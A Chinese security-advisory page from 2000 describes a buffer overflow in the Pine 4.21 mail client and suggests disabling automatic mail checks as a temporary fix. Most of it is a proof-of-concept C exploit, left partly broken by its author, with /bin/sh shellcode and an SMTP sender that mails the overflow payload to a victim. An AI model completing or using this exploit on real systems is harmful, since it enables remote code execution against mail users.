首页 -> 安全研究
安全研究
安全漏洞
Pine 4.21 缓冲区溢出漏洞
发布日期:2000-09-26
更新日期:2000-09-26
受影响系统:
描述:
University of Washington Pine 4.21
Pine 4.21运行时,定时检查邮件的代码存在缓冲区溢出。攻击者可以发送包含溢出代码的邮件
给受攻击者所在的主机,当用户使用"Ctrl_L"检查邮件时,就可能执行攻击者指定的任意代码。
<* 来源:Arkane (arkane@speakeasy.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# #
# PINE Exploit 4.21 [ bTm ] #
# #
Proof of Concept: Pine 4.21
There exists a vulnerability in Pine 4.21 involving the
portion of code in charge of peroidically checking email
when a pine client is open.
Run pine in one window, then send an email to the account
owning that session. Switch back over and hit [Control+L]
(to check your mail).
Woohoo!
now open the core up in gdb:
#2 0x40084098 in abort () at ../sysdeps/generic/abort.c:139
#3 0x817470c in strcpy () at ../sysdeps/generic/strcpy.c:43
#4 0x8137f82 in strcpy () at ../sysdeps/generic/strcpy.c:43
#5 0x8158760 in strcpy () at ../sysdeps/generic/strcpy.c:43
#6 0x40082c28 in __restore ()
at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#7 0xe7e2bfff in ?? ()
Cannot access memory at address 0xe7e2bfff.
Oops, my alignment could use some work.
Hello's : Mega,Loki,Lamagra,and zen-parse.
BTW: this is broken, you have to figure it out on your own how
to smuggle the shellcode in.
Any real Pentester can get this working fairly quickly.
Just be polite, don't forget to say HELO!
Arkane [bTm]
######### ### # ## # # ## # # ## # # # # # # # ### ## ## */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>
unsigned long get_sp (void)
{
__asm__ ("mov %esp, %eax");
}
#define ADDRLEN 700
#define EXECLEN 1000
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main (int argc, char **argv)
{
struct sockaddr_in server;
struct hostent *hp;
int s;
char helo[100];
char mail[100];
char rcpt[100];
char data[2500];
char start[20];
int offset = 0;
unsigned long addr;
int i;
char *addrs,*exec;
addrs = (char *) malloc (ADDRLEN);
exec = (char *) malloc (EXECLEN);
if(argc < 2)
{
printf(" Usage: %s <Email Address> <offset>\n", argv[0]);
printf(" \n\n");
exit(0);
}
if (argc == 3)
offset = atoi (argv[2]);
//addr = get_sp () - offset;
addr = 0xbfffe7e2; //RH62
memset(addrs,0x41,ADDRLEN);
// for (i = 0; i < ADDRLEN ; i += 4)
// *(unsigned *) &addrs[i] = addr;
// memset(exec,0x90,EXECLEN);
// memset(addrs+195,0x90,5);
// memcpy (addrs + 200, shellcode, strlen (shellcode));
if((hp = gethostbyname ("mail.speakeasy.org")) == NULL) {
printf ("Could not resolve mail.speakeasy.org.\n");
exit(1); }
if((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Error");
exit(1); }
server.sin_family = AF_INET;
server.sin_port = htons (25);
server.sin_addr.s_addr = *(u_long *) hp->h_addr;
bzero (&(server.sin_zero), 8);
if(connect(s, (struct sockaddr *) &server, sizeof (struct sockaddr)) == -1) {
printf ("Connection refused\n");
exit(1); }
sprintf (helo, "helo test\r\n");
sprintf (mail, "mail from: %s\r\n",argv[1]);
send (s, helo, strlen (helo), 0);
send (s, mail, strlen (mail), 0);
sprintf (rcpt, "rcpt to: %s\r\n",argv[1]);
send (s, rcpt, strlen (rcpt), 0);
sprintf(start,"data\r\n");
send (s, start, strlen (start), 0);
fprintf(stderr," Message Sent! \n");
sprintf(data,"From: %s AAAAAAAA test@test.net\r\n%s\r\n.\r\nquit\r\n",addrs,exec);
send (s, data, strlen (data), 0);
close (s);
exit(0);
}
建议:
临时解决办法:
NSFOCUS建议您在未得到厂商补丁之前先停止使用Pine自动检查邮件的功能。
厂商补丁:
暂无。
浏览次数:5785
严重程度:0(网友投票)
绿盟科技给您安全的保障